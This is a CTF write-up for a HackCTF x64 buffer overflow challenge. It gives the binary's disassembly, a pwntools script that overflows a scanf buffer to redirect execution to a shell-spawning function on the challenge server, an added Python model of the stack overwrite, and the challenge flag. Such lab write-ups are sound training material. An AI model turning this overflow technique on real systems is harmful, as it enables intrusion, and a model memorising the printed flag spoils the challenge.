
[HackCTF] x64 buffer overflow

d2n0s4ur 2021. 8. 8. 13:56

It looks like the program is structured so that calling a function named callMeMaybe pops a shell.

Dump of assembler code for function callMeMaybe:
   0x0000000000400606 <+0>:     push   rbp
   0x0000000000400607 <+1>:     mov    rbp,rsp
   0x000000000040060a <+4>:     sub    rsp,0x20
   0x000000000040060e <+8>:     mov    QWORD PTR [rbp-0x20],0x400734
   0x0000000000400616 <+16>:    mov    QWORD PTR [rbp-0x18],0x40073e
   0x000000000040061e <+24>:    mov    QWORD PTR [rbp-0x10],0x0
   0x0000000000400626 <+32>:    mov    rax,QWORD PTR [rbp-0x20]
   0x000000000040062a <+36>:    lea    rcx,[rbp-0x20]
   0x000000000040062e <+40>:    mov    edx,0x0
   0x0000000000400633 <+45>:    mov    rsi,rcx
   0x0000000000400636 <+48>:    mov    rdi,rax
   0x0000000000400639 <+51>:    call   0x4004f8 <execve@plt>
   0x000000000040063e <+56>:    nop
   0x000000000040063f <+57>:    leave
   0x0000000000400640 <+58>:    ret
End of assembler dump.

The callMeMaybe function.

It invokes /bin/bash through execve.

Dump of assembler code for function main:
   0x0000000000400641 <+0>:     push   rbp
   0x0000000000400642 <+1>:     mov    rbp,rsp
   0x0000000000400645 <+4>:     sub    rsp,0x120
   0x000000000040064c <+11>:    mov    DWORD PTR [rbp-0x114],edi
   0x0000000000400652 <+17>:    mov    QWORD PTR [rbp-0x120],rsi
   0x0000000000400659 <+24>:    lea    rax,[rbp-0x110]
   0x0000000000400660 <+31>:    mov    rsi,rax
   0x0000000000400663 <+34>:    mov    edi,0x400741
   0x0000000000400668 <+39>:    mov    eax,0x0
   0x000000000040066d <+44>:    call   0x400508 <__isoc99_scanf@plt>
   0x0000000000400672 <+49>:    lea    rax,[rbp-0x110]
   0x0000000000400679 <+56>:    mov    rdi,rax
   0x000000000040067c <+59>:    call   0x4004e0 <strlen@plt>
   0x0000000000400681 <+64>:    mov    DWORD PTR [rbp-0x4],eax
   0x0000000000400684 <+67>:    lea    rax,[rbp-0x110]
   0x000000000040068b <+74>:    mov    rsi,rax
   0x000000000040068e <+77>:    mov    edi,0x400744
   0x0000000000400693 <+82>:    mov    eax,0x0
   0x0000000000400698 <+87>:    call   0x4004e8 <printf@plt>
   0x000000000040069d <+92>:    mov    eax,0x0
   0x00000000004006a2 <+97>:    leave
   0x00000000004006a3 <+98>:    ret
End of assembler dump.

   0x0000000000400663 <+34>:    mov    edi,0x400741
   0x0000000000400668 <+39>:    mov    eax,0x0
   0x000000000040066d <+44>:    call   0x400508 <__isoc99_scanf@plt>
   0x0000000000400672 <+49>:    lea    rax,[rbp-0x110]

The string is read in with scanf. This string occupies 0x110 bytes of memory.

   0x000000000040067c <+59>:    call   0x4004e0 <strlen@plt>
   0x0000000000400681 <+64>:    mov    DWORD PTR [rbp-0x4],eax

The length of the input string is stored in a 4-byte slot.

   0x000000000040068e <+77>:    mov    edi,0x400744
   0x0000000000400693 <+82>:    mov    eax,0x0
   0x0000000000400698 <+87>:    call   0x4004e8 <printf@plt>

It prints Hello {input string}.

Write past the stack buffer and the SFP so that RET ends up holding the address of callMeMaybe.

from pwn import *

#p = process("./64bof_basic")
p = remote("ctf.j0n9hyun.xyz",3004)

addr = 0x0000000000400606                 # callMeMaybe
s = b"\x90"*(0x110+8) + p64(addr)         # padding up to RET, as bytes so it concatenates with p64 on Python 3

p.sendline(s)
p.interactive()

0x110 (number of bytes in the string) + 4 (the variable that stores strlen's value) + 4 (SFP)
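To make the accounting above concrete, here is an added Python example (not part of the original writeup, and it does not use pwntools). It parses a constructed excerpt of the main disassembly shown above, derives where the scanf buffer and the 4-byte strlen local sit relative to rbp, computes the distance from the buffer to the saved return address (counting the saved rbp as 8 bytes on x86-64, which gives the same 0x118 total the script uses), and models the frame as a byte array to show which bytes of an oversized input land in the RET slot. The function names parse_frame, layout, ret_slot_after_write and p64, and the marker bytes in the modelled frame, are assumptions for illustration.

```python
import re
import struct

# Constructed excerpt of the writeup's GDB dump of main (Intel syntax): only the
# lines the analysis needs, copied from the disassembly above.
MAIN_DUMP = """\
   0x0000000000400645 <+4>:     sub    rsp,0x120
   0x0000000000400659 <+24>:    lea    rax,[rbp-0x110]
   0x0000000000400660 <+31>:    mov    rsi,rax
   0x000000000040066d <+44>:    call   0x400508 <__isoc99_scanf@plt>
   0x000000000040067c <+59>:    call   0x4004e0 <strlen@plt>
   0x0000000000400681 <+64>:    mov    DWORD PTR [rbp-0x4],eax
"""

SAVED_RBP = 8   # 'push rbp' stores an 8-byte frame pointer between the locals and RET
RET_SIZE = 8    # return address width on x86-64


def p64(value):
    """Little-endian 8-byte pack, like pwntools' p64 (defined here to stay dependency-free)."""
    return struct.pack("<Q", value)


def parse_frame(dump):
    """Return (frame_size, buf_off, strlen_off) read from the dump text:
    frame_size  - bytes reserved by 'sub rsp,N'
    buf_off     - rbp-relative offset of the buffer handed to scanf
                  (the last 'lea rax,[rbp-N]' before the call)
    strlen_off  - rbp-relative offset of the DWORD that receives strlen's result
    """
    frame = buf_off = strlen_off = last_lea = None
    for line in dump.splitlines():
        m = re.search(r"sub\s+rsp,0x([0-9a-f]+)", line)
        if m:
            frame = int(m.group(1), 16)
        m = re.search(r"lea\s+rax,\[rbp-0x([0-9a-f]+)\]", line)
        if m:
            last_lea = int(m.group(1), 16)
        if "scanf" in line and buf_off is None:
            buf_off = last_lea
        m = re.search(r"mov\s+DWORD PTR \[rbp-0x([0-9a-f]+)\],eax", line)
        if m:
            strlen_off = int(m.group(1), 16)
    return frame, buf_off, strlen_off


def layout(buf_off, strlen_off):
    """Frame positions expressed as offsets from the start of the scanf buffer."""
    return {
        "strlen_local_at": buf_off - strlen_off,   # the 4-byte local sits inside the 0x110 region
        "saved_rbp_at": buf_off,
        "ret_at": buf_off + SAVED_RBP,
    }


def ret_slot_after_write(buf_off, data, ret_marker=b"R" * RET_SIZE):
    """Model an unbounded scanf("%s") into the buffer: build [buffer+locals][saved rbp][RET]
    as bytes, copy every byte of `data` starting at the buffer with no length check (as the
    original program does), and return the 8 bytes that end up in the RET slot. If the input
    is too short to reach RET, the marker comes back unchanged."""
    frame = bytearray(buf_off) + bytearray(b"B" * SAVED_RBP) + bytearray(ret_marker)
    frame[0:len(data)] = data
    ret_at = buf_off + SAVED_RBP
    return bytes(frame[ret_at:ret_at + RET_SIZE])


if __name__ == "__main__":
    frame, buf_off, strlen_off = parse_frame(MAIN_DUMP)
    print(f"frame 0x{frame:x}, buffer at rbp-0x{buf_off:x}, strlen local at rbp-0x{strlen_off:x}")
    print("offsets from buffer start:", {k: hex(v) for k, v in layout(buf_off, strlen_off).items()})
    # The writeup's padding: 0x110 + 8 bytes, followed by the callMeMaybe address.
    data = b"\x90" * (buf_off + SAVED_RBP) + p64(0x400606)
    print("RET slot holds:", ret_slot_after_write(buf_off, data).hex())
```

The parser keys on the last `lea rax,[rbp-N]` before the scanf call because that register is copied into rsi as the buffer argument; the strlen local at rbp-0x4 is clobbered on the way to RET but nothing reads it after printf, which is why the writeup can ignore it beyond counting its size.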


FLAG : HackCTF{64b17_b0f_15_51mpl3_700}
